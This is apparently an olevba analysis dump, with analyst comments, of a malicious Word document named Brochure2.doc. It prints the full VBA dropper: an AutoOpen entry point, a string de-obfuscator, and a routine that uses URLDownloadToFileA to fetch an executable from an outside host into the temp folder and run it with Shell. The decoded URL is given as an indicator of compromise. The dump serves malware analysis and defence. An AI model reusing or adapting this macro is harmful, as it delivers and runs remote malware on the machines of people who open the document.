dynamoo

Malicious Word macro

Mar 5th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS---- Brochure2.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Brochure2.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: Brochure2.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Entry point. "AutoOpen" (VBA names are case-insensitive) runs automatically when the
  ' document is opened with macros enabled, which is what olevba's AutoExec flag reports.
  ' Its only action is to call eE5Ueh5, defined in Module4 below, which decodes the
  ' download URL / drop path and hands them to the download-and-execute routine.
  Sub autoopen()
  eE5Ueh5
  End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Class1.cls
  27. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Class1'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  ' Class1: every procedure in this class module has an empty body, and none of these
  ' names is referenced anywhere in the extracted code (the live path is
  ' autoopen -> eE5Ueh5 -> VQuwdjCKzfbbafP / E1MwLaU707). They do nothing at runtime;
  ' presumably filler to pad the VBA project -- an inference, not something the code shows.
  Private Function PvEED()

  End Function
  Public Function tYlkADG()

  End Function
  Private Sub fOxzTwB()

  End Sub
  Private Function HvhIfeFnE()

  End Function
  Private Function uGASPmHgZUgxMi()

  End Function
  Public Sub xbdIdjqgLUV()

  End Sub
  Public Function CJoBAQTQO()

  End Function
  Private Sub gNPkMRfcK()

  End Sub
  54. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  55. ANALYSIS:
  56. No suspicious keyword or IOC found.
  57. -------------------------------------------------------------------------------
  58. VBA MACRO ААвыаыва.bas
  59. in file: Brochure2.doc - OLE stream: u'Macros/VBA/\u0410\u0410\u0432\u044b\u0430\u044b\u0432\u0430'
  60. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Win32 import hidden only by its local name: dfsdfsdfsdf is urlmon.dll!URLDownloadToFileA
  ' (the Alias clause gives the real export, which is why olevba still flags it).
  ' The #If VBA7 branch uses PtrSafe/LongPtr so the declaration also loads under 64-bit
  ' Office; the #Else branch is the legacy 32-bit form. Parameter order follows the API:
  ' (caller, URL, destination file name, reserved, status callback).
  #If VBA7 Then
      Private Declare PtrSafe Function dfsdfsdfsdf Lib "urlmon" Alias _
      "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
      ByVal sdfsdFFdsf As String, _
      ByVal sdfsdFFdsff As String, _
      ByVal sdfsdFFdsffd As Long, _
      ByVal sdfsdFFdsffds As LongPtr) As LongPtr
  #Else
      Private Declare Function dfsdfsdfsdf Lib "urlmon" Alias _
      "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
      ByVal sdfsdFFdsf As String, _
      ByVal sdfsdFFdsff As String, _
      ByVal sdfsdFFdsffd As Long, _
      ByVal sdfsdFFdsffds As Long) As Long
  #End If
  76.  
  ' Download-and-execute primitive. BcbMtG1 is the URL to fetch, o04C the local file to
  ' write it to (the caller passes a path under %TMP%).
  '  1) URLDownloadToFileA writes the URL's body straight to o04C (caller 0, no callback).
  '  2) Shell(o04C, 1) launches whatever was written, window style 1 (vbNormalFocus).
  ' The download's return code is stored in vJHKBJdfkgfg but never inspected, so Shell is
  ' attempted even if the download failed. The Boolean return value is never assigned,
  ' so the function always returns False; the caller ignores it anyway. vJHKBJdfkgfg and
  ' fTb_A are undeclared (no Option Explicit in this module), i.e. implicit Variants.
  Function E1MwLaU707(BcbMtG1 As String, o04C As String) As Boolean
  vJHKBJdfkgfg = dfsdfsdfsdf(0&, BcbMtG1, o04C, 0&, 0&)
  fTb_A = Shell(o04C, 1)
  End Function
  81.  
  82. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  83. ANALYSIS:
  84. +------------+--------------------+-----------------------------------------+
  85. | Type       | Keyword            | Description                             |
  86. +------------+--------------------+-----------------------------------------+
  87. | Suspicious | Lib                | May run code from a DLL                 |
  88. | Suspicious | Shell              | May run an executable file or a system  |
  89. |            |                    | command                                 |
  90. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  91. +------------+--------------------+-----------------------------------------+
  92. -------------------------------------------------------------------------------
  93. VBA MACRO Class2.cls
  94. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Class2'
  95. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  96.  
  ' Class2: as with Class1, every procedure here has an empty body and none is referenced
  ' from the code that actually runs (autoopen -> eE5Ueh5 -> VQuwdjCKzfbbafP / E1MwLaU707).
  ' No runtime effect; likely padding -- an inference, not something the code shows.
  Private Sub xMiUfC()

  End Sub
  Private Sub Idjqg()

  End Sub
  Public Sub TZwCJoBAQTQOoCv()

  End Sub
  Public Sub kMRfcKYxxZhuV()

  End Sub
  Public Function KlLQQjRpY()

  End Function
  Private Sub wNdkmvS()

  End Sub
  Public Sub agzHwcYYQ()

  End Sub
  Public Sub arRQhQaRqTyweS()

  End Sub
  Private Sub isbbNNpyKmGlJc()

  End Sub
  Private Sub SliFpzFBNefACLj()

  End Sub
  Private Function qwPYMsoonsdV()

  End Function
  Private Sub TknqiGOyujDuk()

  End Sub
  Private Sub reQsObpQ()

  End Sub
  Private Function EspjBy()

  End Function
  Private Function VRehvQScmhKasM()

  End Function
  142. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  143. ANALYSIS:
  144. No suspicious keyword or IOC found.
  145. -------------------------------------------------------------------------------
  146. VBA MACRO Module2.bas
  147. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Module2'
  148. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  149.  
  ' String de-obfuscator used by eE5Ueh5: returns the characters of nqtlJnRBxmGxoBL at
  ' odd 1-based positions (1, 3, 5, ...) and drops the even ones. The encoded literals
  ' interleave the real value with one junk character between each real character.
  ' An empty input yields "" (the loop body never runs; a String function defaults to "").
  ' The loop counter uiTvResardhH is undeclared (implicit Variant; no Option Explicit here).
  ' Because the real strings never appear contiguously in the VBA source, olevba's
  ' IOC/URL extraction has nothing to match -- note the missing "I" flag in the summary.
  Public Function VQuwdjCKzfbbafP(nqtlJnRBxmGxoBL As String) As String
  For uiTvResardhH = 1 To Len(nqtlJnRBxmGxoBL) Step 2
  VQuwdjCKzfbbafP = VQuwdjCKzfbbafP & Mid(nqtlJnRBxmGxoBL, uiTvResardhH, 1)
  Next
  End Function
  155. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  156. ANALYSIS:
  157. No suspicious keyword or IOC found.
  158. -------------------------------------------------------------------------------
  159. VBA MACRO Module3.bas
  160. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Module3'
  161. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  162. (empty macro)
  163. -------------------------------------------------------------------------------
  164. VBA MACRO Module4.bas
  165. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Module4'
  166. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Module4 filler: the procedures below all have empty bodies and are not referenced
  ' anywhere in the extracted code. Several names are substrings or variants of the
  ' Class1/Class2 stub names (e.g. agzHwcYYQ / NrtagzHwcYYQbM, fOxzTwB / mfOxzTwBOZuHvhI),
  ' consistent with generated padding -- an inference, not something the code shows.
  ' The only procedure in this module that matters is eE5Ueh5, which follows.
  Public Sub YjplwNdk()

  End Sub
  Public Function NrtagzHwcYYQbM()

  End Function
  Private Sub RQhQaRqT()

  End Sub
  Public Function SndTi()

  End Function
  Private Sub NNpyK()

  End Sub
  Private Sub JcncZSl()

  End Sub
  Public Function zFBNefAC()

  End Function
  Private Function tJqwPYMsoonsdV()

  End Function
  Private Sub TknqiG()

  End Sub
  Public Sub ujDukyIrre()

  End Sub
  Private Function bpQoaeEspjByV()

  End Function
  Private Function RehvQScmhKasMga()

  End Function
  Private Function EDItmtYlkAD()

  End Function
  Private Function mfOxzTwBOZuHvhI()

  End Function
  ' Payload stage, called from autoopen. Every literal is passed through VQuwdjCKzfbbafP
  ' (keep odd-position characters) before use:
  '  - "TPMnPI" decodes to "TMP", so Environ(...) is the user's temp directory;
  '  - "\U3z2%4u2N3E5F2C3L5/.†e0xje:" decodes to "\3242352535.exe";
  '    together these give the drop path %TMP%\3242352535.exe.
  '  - The first literal is the download URL. As pasted it appears to be one character
  '    short: the odd-position characters are garbage, while the even-position characters
  '    read http://data.gmsllp.com/js/bin.exe. Treat that host/path as the IOC, but confirm
  '    against the original sample rather than this transcription.
  ' E1MwLaU707 (other module) then downloads the URL to that path and runs it with Shell.
  ' olevba flagged only "Environ" for this module: URLDownloadToFileA and Shell are in a
  ' different module and the URL/.exe strings are obfuscated, so the per-module keyword
  ' table understates what this Sub does; read the call chain, not the table.
  Sub eE5Ueh5()
  E1MwLaU707 VQuwdjCKzfbbafP("ht@tPp<:y/o/pdmawtZag.ug1mdscl‚lnpt.dc0ogm?/;j|sf/)b{iin„.4evxve]"), Environ(VQuwdjCKzfbbafP("TPMnPI")) & VQuwdjCKzfbbafP("\U3z2%4u2N3E5F2C3L5/.†e0xje:")
  End Sub
  212. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  213. ANALYSIS:
  214. +------------+---------+---------------------------------------+
  215. | Type       | Keyword | Description                           |
  216. +------------+---------+---------------------------------------+
  217. | Suspicious | Environ | May read system environment variables |
  218. +------------+---------+---------------------------------------+
  219. -------------------------------------------------------------------------------
  220. VBA MACRO UserForm1.frm
  221. in file: Brochure2.doc - OLE stream: u'Macros/VBA/UserForm1'
  222. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  223. (empty macro)